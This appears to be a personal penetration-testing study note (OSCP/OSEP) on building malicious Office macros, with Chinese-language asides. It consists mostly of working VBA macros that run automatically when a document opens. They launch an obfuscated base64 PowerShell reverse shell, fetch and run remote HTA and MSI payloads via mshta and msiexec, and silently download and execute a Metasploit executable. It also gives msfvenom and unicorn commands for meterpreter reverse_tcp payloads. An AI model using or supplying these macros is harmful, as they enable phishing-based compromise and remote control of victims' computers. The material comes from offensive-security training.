macro trojon - My-oscp-all-things

[Online - Reverse Shell Generator](https://www.revshells.com/) [在线文本字符串分割工具 - UU在线工具](https://uutool.cn/txt-slice/) [Site Unreachable](https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58) [Site Unreachable](https://ivanitlearning.wordpress.com/2020/08/06/rce-on-windows-x86-vs-x64-powershell-payloads/) [Powershell scripts used to run malicious shellcode. Reverse shell vs Bind shell – CYBER GEEKS](https://cybergeeks.tech/powershell-scripts-used-to-run-malicious-shellcode-reverse-shell-vs-bind-shell/) [Reverse Shell Generator](https://weibell.github.io/reverse-shell-generator/) ### odt-shell https://www.hackplayers.com/2018/06/shell-mediante-un-documento-odt.html ### xlsx ```evil hta Sub HelloWorld() PID = Shell("mshta.exe http://10.50.1.180:8080/4dmhetOBBmjt.hta") End Sub Sub Auto_Open() HelloWorld End Sub //一直不成功？？，换一种方式，不用了原因主要在主要需要建立模块。 ``` ``` Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUA" Str = Str + "dwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdA" Str = Str + "AuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAo" Str = Str + "ACIAMQA5ADIALgAxADYAOAAuADEAMQA5AC4AMQA1ADkAIgAsAD" Str = Str + "gAMAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUA" Str = Str + "bgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdA" Str = Str + "BlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1" Str = Str + "ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD" Str = Str + "0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQA" Str = Str + "ZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdA" Str = Str + "BoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9" Str = Str + "ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE" Str = Str + "4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMA" Str = Str + "QwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcg" Str = Str + "BpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAk" Str = Str + "AHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAG" Str = Str + "EAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" Str = Str + "bgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJA" Str = Str + "BzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAg" Str = Str + "ACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AC" Str = Str + "QAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4A" Str = Str + "ZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARw" Str = Str + "BlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgAp" Str = Str + "ADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG" Str = Str + "4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A" Str = Str + "TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQ" Str = Str + "BzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBl" Str = Str + "ACgAKQA=" CreateObject("Wscript.Shell").Run Str End Sub ``` [Fetching Title#4ida](https://www.redteam101.tech/offensive-security/initial-access/phishing-with-ms-office/phishing-xlm-macro-4.0) ### ``` python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta ``` ### DOC ``` 32位的？？ ``` ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.119.160 lport=80 -f msi > 1.msi Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() PID = Shell("msiexec /q /i http://192.168.119.160/1.msi") End Sub Sub Auto_Open() MyMacro End Sub ``` ``` Sub HelloWorld() PID = Shell("mshta.exe http://192.168.119.250/4dmhetOBBmjt.hta") End Sub Sub Auto_Open() HelloWorld End Sub ``` ![[Pasted image 20220414004855.png]] ### osep ways ```vb Dim str As String str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe','msfstaged.exe')" Shell str, vbHide Sub Document_Open() MyMacro End Sub Sub AutoOpen() MyMacro End Sub Sub MyMacro() Dim str As String str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')" Shell str, vbHide Dim exePath As String exePath = ActiveDocument.Path + "\msfstaged.exe" Wait (2) Shell exePath, vbHide End Sub Sub Wait(n As Long) Dim t As Date t = Now Do DoEvents Loop Until Now %3E= DateAdd("s", n, t) End Sub ``` ### 位置 ``` macor_shell ```